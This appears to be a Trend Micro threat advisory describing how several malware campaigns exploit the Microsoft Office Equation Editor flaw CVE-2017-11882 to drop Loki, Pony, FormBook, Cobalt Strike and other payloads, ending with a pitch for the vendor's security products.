Trend Micro uncovered a malicious Rich Text Format (RTF) file exploiting CVE-2017-11882 to deliver the spyware Loki (TSPY_LOKI). The payload is dropped via an HTML Application (HTA) that invokes PowerShell, which then retrieves the information stealer.
What does CVE-2017-11882 entail?
CVE-2017-11882 is a 17-year old memory corruption issue in Microsoft Office (including Office 360). When exploited successfully, it can let attackers execute remote code on a vulnerable machine—even without user interaction—after a malicious document is opened. The flaw resides within Equation Editor (EQNEDT32.EXE), a component in Microsoft Office that inserts or edits Object Linking and Embedding (OLE) objects in documents. A proof-of-concept exploit was released publicly, but this has been fixed by Microsoft’s November Patch Tuesday.
The Loki family can steal account information from File Transfer Protocol (FTP) clients, as well as credentials stored on various web browsers and cryptocurrency wallets. Loki can also harvest data from “Sticky”-related (i.e., Sticky Notes) and online Poker game applications.
Trend Micro’s initial and ongoing analysis also found that a spammer group is also actively exploiting CVE-2017-11882 to infect systems with information stealers Pony/FAREIT and FormBook. The attack chain involves the use of a command that retrieves the payloads from a remote Server Message Block (SMB) open directory.
The Cobalt hacking group also weaponized this security flaw in one of their campaigns in late November, sending out a similarly constructed RTF file. The final payload is a dynamic-link library (DLL) file. In their previous spear-phishing campaigns, the DLL is a component of the penetration testing tool Cobalt Strike, which they abuse to hijack the infected system.
Trend Micro also saw other threat actors using CVE-2017-11882 to infect systems with a keylogger and a lockscreen with a ransom note that resembles that of Bad Rabbit. Spam runs were also seen in Australia and Japan on November 21, which dropped ZLoader—a downloader Trojan for ZBOT—and Ursnif, respectively.
Screenshots of the sample emails in the spam runs in Australia (left) and Japan (right)
What can users and businesses do?
Here are some of the countermeasures that can be used against threats that use CVE-2017-11882:
These solutions are powered by the Trend Micro XGen™ security, which provides a cross-generational blend of threat defense techniques against a full range of threats for data centers, cloud environments, networks, and endpoints. It features high-fidelity machine learning to secure the gateway and endpoint data and applications, and protects physical, virtual, and cloud workloads.